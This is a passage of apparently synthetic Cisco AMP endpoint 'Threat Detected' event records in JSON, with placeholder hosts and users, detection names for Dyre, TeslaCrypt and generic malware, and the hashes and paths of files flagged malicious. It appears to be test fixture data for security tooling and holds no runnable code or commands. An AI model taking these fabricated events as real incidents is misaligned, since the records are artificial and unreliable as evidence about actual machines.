Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668623368585248","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258878267720000,"timestamp":1610705810,"timestamp_nanoseconds":322000000,"date":"2021-01-15T10:16:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258878267719767","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258826728112000,"timestamp":1610705798,"timestamp_nanoseconds":310000000,"date":"2021-01-15T10:16:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258826728112214","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251202912551000,"timestamp":1610705786,"timestamp_nanoseconds":262000000,"date":"2021-01-15T10:16:26+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251202912550913","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"t.exe","file_path":"\\\\?\\C:\\Windows\\System32\\t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"},"parent":{"process_id":3164,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad","sha1":"cea0890d4b99bae3f635a16dae71f69d137027b9","md5":"8b88ebbb05a0e56b7dcc708498c02b3e"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258706469028000,"timestamp":1610705770,"timestamp_nanoseconds":292000000,"date":"2021-01-15T10:16:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258706469027925","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258680699224000,"timestamp":1610705764,"timestamp_nanoseconds":286000000,"date":"2021-01-15T10:16:04+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258680699224148","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668365670547000,"timestamp":1610705756,"timestamp_nanoseconds":428000000,"date":"2021-01-15T10:15:56+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668365670547487","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668365670547000,"timestamp":1610705756,"timestamp_nanoseconds":39000000,"date":"2021-01-15T10:15:56+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668365670547486","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668365670547000,"timestamp":1610705756,"timestamp_nanoseconds":9000000,"date":"2021-01-15T10:15:56+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668361375580189","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668361375580000,"timestamp":1610705755,"timestamp_nanoseconds":616000000,"date":"2021-01-15T10:15:55+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668361375580188","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258629159617000,"timestamp":1610705752,"timestamp_nanoseconds":649000000,"date":"2021-01-15T10:15:52+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258629159616595","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258577620009000,"timestamp":1610705740,"timestamp_nanoseconds":637000000,"date":"2021-01-15T10:15:40+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258577620009042","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258526080401000,"timestamp":1610705728,"timestamp_nanoseconds":609000000,"date":"2021-01-15T10:15:28+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258526080401489","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258474540794000,"timestamp":1610705716,"timestamp_nanoseconds":987000000,"date":"2021-01-15T10:15:16+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258474540793936","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258423001186000,"timestamp":1610705704,"timestamp_nanoseconds":959000000,"date":"2021-01-15T10:15:04+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258423001186383","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668103677542000,"timestamp":1610705695,"timestamp_nanoseconds":470000000,"date":"2021-01-15T10:14:55+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668103677542427","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668103677542000,"timestamp":1610705695,"timestamp_nanoseconds":112000000,"date":"2021-01-15T10:14:55+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668103677542426","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668103677542000,"timestamp":1610705695,"timestamp_nanoseconds":71000000,"date":"2021-01-15T10:14:55+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668103677542425","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668099382575000,"timestamp":1610705694,"timestamp_nanoseconds":696000000,"date":"2021-01-15T10:14:54+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668099382575128","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258371461579000,"timestamp":1610705692,"timestamp_nanoseconds":947000000,"date":"2021-01-15T10:14:52+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258371461578830","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258324216938000,"timestamp":1610705681,"timestamp_nanoseconds":403000000,"date":"2021-01-15T10:14:41+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258324216938573","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258272677331000,"timestamp":1610705669,"timestamp_nanoseconds":298000000,"date":"2021-01-15T10:14:29+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258272677331020","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258221137723000,"timestamp":1610705657,"timestamp_nanoseconds":270000000,"date":"2021-01-15T10:14:17+00:00","event_type":"Threat 